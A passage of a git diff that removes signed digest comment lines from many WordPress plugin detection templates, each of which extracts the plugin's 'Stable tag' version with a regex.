+46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009de938022a8653834e9d75719373bb65b6c6d6a761497321944cc4d2fe3ccb9302204bfa65c6b953e43d91e3fc09d52344cbeadcfede7ad249a2a3f41efe68cf7fd3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 273aca0c16..e7db9944e4 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100836cdd0a20a576bf6628cb82489352e3970db82d7e518e37322a2861c424c22f022012494a44e4e12c2dd32e304155e0a39e9e119f3ac3f8eed52fb8489f2ad78a1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index a5059e2dc1..268bd7b9df 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207ff24949f73009a3a0f93686055039906d8b2f411b58e06431d390891a7bbd9a022021b9ce449db0a3289f435508072fe513a78fea18dffac591f758ec87b4b1b60b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index bb431d417d..d7fb2209d1 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204df5f0f63459edae76afc76cd21359a7d2b5045f201385d4df7ba1808acb649f0220523dacd33ce38899320c7cea7fd1702d905cc1488dba38f9bb6d3c8dc076bb8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 133d1f95ef..a1641d4632 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100dcc798f3e5ff0c479a782f74fcf60812311e8ebae5af3a3eba791f650f538bc3022100a416ba0ebc0a7ddb70a51bedf4e4b7b9d4132c4bd3b2a0335cea5b231aa82b79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 703130c6e9..3b6542683c 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c743d8a173bcef619c60ed4aa5130a7fed8d964eb51a854db21c537312870250022000d0aa585359c41c67c4926648174b0a699cf003a1f42b01578274ba85d6f3c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index deedafdd5e..969c280ee1 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009e034ea5c0e2f76f67fb6a13801af869484fd8b8d5a2766336dd19c12d5f4d6c0220423d79f1da2cc5053be587dbd52cb7a5a1325af021e45673396b30a98fcaf5e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index ac44a1059e..1c97c422e4 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022019aeafcb5f72e792b5d388858b06602c89b81611bb61606554d6ff76e0d793b902210091669cdc5e8243af828f1e8a36b53c63f3c29aee7240d752da349de8ad48f909:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 916e7c8f69..7d861cf06a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022055f57921d1ff6c55fc2c3ea71008e2085998aa588595799fbd86af45cf88195d022100bef325040c1ea0dc4c0baa992eecf11bd5a85486ecab1617000e0624042c0326:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 2d621a6bbc..00eb1e2dfc 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022036ce592e64cc9eb3d4e6380a02d1588f6f6cec8c8211965b62e5f1cc8dd05760022100a52b463701852c6620fa020661d666c4f6e60846e488f5b8e57a0361221bad38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index 984384e528..f089ee37d3 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205f5f1af07e2ffa4e64fa5ec707eb805830756d3b5d30f5f53a989b426724691a02204b622da48739753ef29346ba57bf47cf089f79f027fb7807573055b9cb22d44d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 88dcb57f68..492d66db68 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ae70926afbca91fe98eba48df5c9c50d1e2e31ee4e376bc6445c93d7a29b0efd0220562edab7ce1cb1ba9e30d8f4495c48eb179db4127969cbf1ffa9d18366b94f32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index ced345b335..f8903fa3db 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f79d80995db6965679132f3a23e9a8f695e2e1c18c25cce7228bb2b1c09fb58e022100f51fd9c5d9ba5f5e7201f534905c1d8e548496c4fe6d630183e6c0a5d7a76d8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 54f042484e..ae2451ca38 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fd8e76bd5617d84f3502f6ac7815fab1e39c37687ab025d892b59ce673906835022064133d244213939c5625d1dec77653e9f9d8f6021f66f7486c4ec1cd80f24c97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 1fc751f705..dcc61d1255 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b5f1c77ef13a385bc28cee8af8e00ae9c33a49e0430bb71720e0b839e7ff8014022043f525cf3898db19182533b40a58d0e3698beba763ad10c473570ee4939a2663:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 067a30a6c0..d1d2c1c1d0 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100db93cf4f7b08826526eead1909a331f24020750d437a7a4c066d2feabe8d512202202c9c81deb9660bec15e13a4a971986c13dcf3505d02c5cf978c36266cb3e463a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index c9c7c50e0e..5f5e8afed5 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022070d05ccf6940451889643784d927a77d34cef205ead893e6b9817e7c45b34d4a0220237941e2039e0dbea473b6008f9fbcc05a51a960b8decf33a80893d18aa82913:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index 2dd426bf49..d15634bb2b 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c1809dc3e025ca50eaeda558b173ca1a764260e743be1b6a728dcff4832ec7c602201941a8b9f8f9bf32556ebbd50f5f9e6693913c9f42d7d48d2143acfdcead30ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 7941b86c58..7da04be5d3 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022052b60931c608372def382afe0964ca0f24e38822d5498eb1ace116ac06c5164502207020f7d804aca4a814b43a0f4d194db2c6271d47aad242ae0493555d54e4deca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 09f529170d..a79253cec5 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022075c81a4fe0fc3ca6b97744561027a628511e80c01f096897fb6ab7191ae6dd2c022100c34e6d2585971faf6d426e5e6e6b06302b80d4db5320acd9cf3d450412f52573:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index b80bec5e3b..77fc04a220 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220426afcdba5dd87b288748ba663cf003e03147cd92cea9ddfecaeddc62fd4b9c302204a0206fbabbe28a63b2a4c1abfa6b0e18d5697a0ffc62181705b290dc86ef7fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index e158397bf0..733f9ee453 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220423ab9e90cf0d2f89a4386353f5e8aed67a62256d51b9d73214463fdd69cd773022100cba8e0559576a306776cae42976df51346b0ab2af608e3d6c10213778655c8a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index a31a8a698b..0af08f0ac0 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201d2dfa8258c5b2234d969644becf45a97a0ba5428be95cf2688ebcd3723b2b35022026d96cf2e8858b0749cffb3ff0917b371a3048518b89222c0459204450b30e8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 768d9a5749..1e4c77fbca 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cc6a83ee0bb71da2794523b3ce00d9490ed49f545f307701c7ac37c82cd3506602206f9214837d85abc86ad559af8a84dc3abbb76fe4c8d66fae8930148ac73d1f76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index ae870795bb..295e3fe82d 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d7b1e1d7d108fec3c216247495edb64d6f6a8bee5f037d7c54fb2207a24f695f022100bef83542490e195ec34be98d93ce7777ea09e9a7889ee153a5393491e4010ec3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index dd54b0e8c2..862f73201f 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022043146fe92f14ee35cd7af0839e5373a17b4be4b81cf670abde584c9c43f6c264022051a77df97500808cb72cef7ec653422bb64d98ba5997cd34e534f77e55eba413:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index dd1e562889..711b64f9d0 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220361581e309563bca4dfef6d7d87f52b12c77ad3ded38f91f0576b3077c52ebd102210097efe1b3e4f8b05f31cd9ecada5973d595e858ae32a9f5f4c45e20977eeff49c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 7bfc391471..58ddcfab78 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009495268f12358b8f6ae8fcf49d4d88d0d1f8526a70632c72514a493c531ed65e0221009776b770a16885a51dcf51029c680064e52a42fb258793266c06794a335f5690:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 1606fa0745..305d74e8ea 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210084ffc7eff5f8b1641a544ab3062f2c2a388a3e8e599fc07b0c896a8fcb6861bc0220422a54a183d1ec92b7d11c6a376bf9c9c108e1bfeb1393807c3f848fbb7d820c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index c46adc6ea8..668162fc4e 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e3acccc9e2923cac460c70172579994e98a07ed6ab7997b96137536cf99acfa502207af8e1772729160320dda9b47dba2ca7cfe1c6d739107bbe1e40dea0d44ece66:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 44122f19ea..2a233f389d 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b59c895808ff011880898cfb1d0aefbb7ce785dd26d738a49adbf828bead19d10220275691897e351685c727cc62ae021ea98c8f116c31c21eab5fd9205b17c879b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index 5243e096dd..a0d2554492 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008c4cb7f129d58607615f202011fa392f30118f38c336b43133e1f0ed3908403402205b5a2f8e597e944232fb509f0956d6a1c10468a838e0caf158c5cecf42551d92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index c8dfc5b2cb..4e5046273d 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a4f2b7fd5b40cf5ca0dde8cf7199ab2431ac6b61e21165fbf9e68db3e09b1c47022100ac7efd9945ee2a06afa369496779ae31e9041c34d5d622afac0bdc47a5537982:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index 5095f1d4b1..f44cee7980 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009fb8dc318cfa27e36518785dfe3a630b1280bd98b3ba4d9b8a32cc2823a8466602201093c64ac68873374c55247ed3130b7eda9dbd272ec28140ed4476a36ce764e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index c7d9f9522d..39130db767 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206b65266613bf84a9ed3c0f83699fa33afe4b70a37b2d99cd1459564d3053f85302210093ea100d25288cefaeff64446fefa259566375cb1bb3462ccea788e588c38c20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index bf1b62c3dc..39c497073c 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220067b96f4458acecff5eb082259fa98b1785f879fc53ebd7c6121e1930596d609022100c2e625feeede1149f315009fcb451c978e7c9d8aa5feec55f639bebc73a94ad8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index ff2c18af8f..b848288b55 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a504b03aa73fc34d3cc61184fa05a8115e83073a15c9d39050f76fa9eaa9a517022100a72bea1d389d9d7c1b296e3f37525183a9a55bcc1f4902053b2eaf226cd5436f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 830fcaa75c..4d10178692 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009372e73fcf6cd7d2d271ef2a752fabe279562d99ba38f6a17e48b630bd7b2b6602204f9267eb754db40375f83ecc3c12c10f0ab0e8ac9148133a6c205148a3a871d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 677a7c873f..7aac0a153f 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008f5f47eac8cc35be7c366ac03d68820bc76c0352e303fe3ecc7befcb7e44846c022100982102ef12aad6072858f99b3d771408abcfdb7415a6933ab9d300468e37bbee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 263c8ac24b..d0cebd5316 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203c06be7048aef37f005165ab9bb9b52109e4ddc46b425e3bb7e2c8d5af01952b022100a6f519a8cc256d5980d6eb4e005e488fa1e1222b1116da18aa1bc7454f28c320:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 5c870ec790..ff20779157 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e1c73277b4be33dc27071c9ed9b3fa70bab489663ff9bed90f6b806d9c5d21f0022100a3f60ad81e2f9ffc37024aa1674579f58c76e46b452168ce2f2f2d12eda18f49:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 86a9642602..fffdc7d017 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ffd196219e173d57ce9cb32861fa08bdcec47fbc5ba7620fd439f2b220f85c1d022100e53300e4240602a5f73c8d3254395a3f2de8b3d3e7d1674864767da5ab541fd3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 91d52dc882..7a9746a70d 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022032e7ba50a883da7ce744993f904513a02122f0ac13aca322f4fe253c54e3a761022100d34558b23334af0571cc5e6355cb9af7c0180361dd3e409b5d04addd396f16a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index b8b6c2bad4..3fe86debf5 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203df3b747e106640dfb96fdba8cf0f683d2d874cc60b2a112d7fdda2392c3be98022100c49fb86d5c345aad058b8d6fedfaca12b74bb9dd1011f2c0baff4b091bea9f75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index c7df69fc70..18a7437e94 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202c720db7232fd5f1d9f506d30b6e58960c286d1becd6dac3418630da0a9bf9580221008e21018406790e6e0f4197dc4027348cc3c36c93d3ceaba4b8f6158eba1cff0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index ebce78520d..3deac58709 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022060cbec6f1ab02e1f621f3b3bd1e6b83ed5044c225714f9cf132573b63c240a470221009efadca739a50edd25fcffa9d3757ca04fe0ce1bd6052576ee57b0529632a7bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index 95bd8300b6..e7e7c27682 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207c2fda4b3ef0544135be10d45abd2c2c2536cac66ade358738fc387b34a5f841022027bfc92b5969f3834c36d234ceb8a4453c107a1ad1b7d2b619ce534661f4c315:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 79d9e47d03..ad4ebefa4b 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008082af722902c3c395120c5a6746499a40c5e8da19074d2824e90f44918f2124022100964508e1c2b5f29e4c918999a677e5aaceea4305036324c83c8429b05e2dd1ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 